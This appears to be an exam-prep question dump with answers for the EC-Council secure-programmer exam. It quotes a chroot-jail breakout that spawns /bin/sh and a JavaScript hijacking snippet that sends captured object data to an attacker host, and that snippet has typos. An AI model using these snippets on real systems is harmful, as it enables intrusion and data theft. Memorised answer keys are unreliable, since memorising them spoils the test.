## $312-92^{\text {Q\&As }}$

## EC-Council Certified Secure Programmer v2

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## QUESTION 1

What is the following shellcode trying to accomplish?
int main(void) \{
mkdir("A");
chdir("A");
chroot("..//..//..//..//../..//..//../");
system("/bin/sh")
A. Corrupt the Linux kernel
B. Break out of "chroot jail"
C. Traverse to the /bin/sh directory
D. Create a buffer overflow

Correct Answer: B

## QUESTION 2

Steve is using the libcap library to create scripts for capturing and analyzing network traffic.
Steve has never used libcap before and is struggling with finding out the correct functions to use. Steve is trying to pick the default network interface in his script and does not know which function to use.

Which function would he use to correctly choose the default interface in the script?
A. pcap_open_live
B. pcap_int_default
C. pcap_lookupdev
D. pcap_use_int

Correct Answer: C

## QUESTION 3

What two encryption methods are used by the Secure Electronic Transaction system?
A. RSA
B. AES
C. DES
D. 3DES

Correct Answer: AC

## QUESTION 4

Paul wants to capture audit information on PLSQL so he executes the following command:
sqlplus "sys / as sysdba"
Enter password: password123!!!!
SQL> ALTER SYSTEM SET AUDIT_TRAIL = OS
SCOPE=SPFILE;
SQL> SHUTDOWN NORMAL;
SQL> STARTUP;
What privileges has Paul logged on with?
A. ADMIN
B. Root
C. SYSDBA
D. SYS

Correct Answer: C

## QUESTION 5

Travis, a senior systems developer for YNY Services, received an email recently from an unknown source. Instead of opening the email on his normal production machine, Travis decides to copy the email to a thumb drive and examine it from
a quarantined PC not on the network. Travis examines the email and discovers a link that is supposed to take him to http://scarysite.com. Travis decides to get back on his production computer and examine the code of that site.

From the following code snippet, what has Travis discovered?
function object() \{
this.email setter = captureobject
\}
function captureobject(x) \{
var objstring = ""
for(fld in this) \{
obstring += fld + ": " this[fld] + ", ";
\}
obstring += "email: " + x;
var req = new XMLHttpRequest();
req.open("GET", "http://scarysite.com?obj=" +
escape(objString), true);
req.send(null); \}
A. URL obfuscation
B. XSS attack
C. JavaScript hijacking
D. URL tampering

Correct Answer: C

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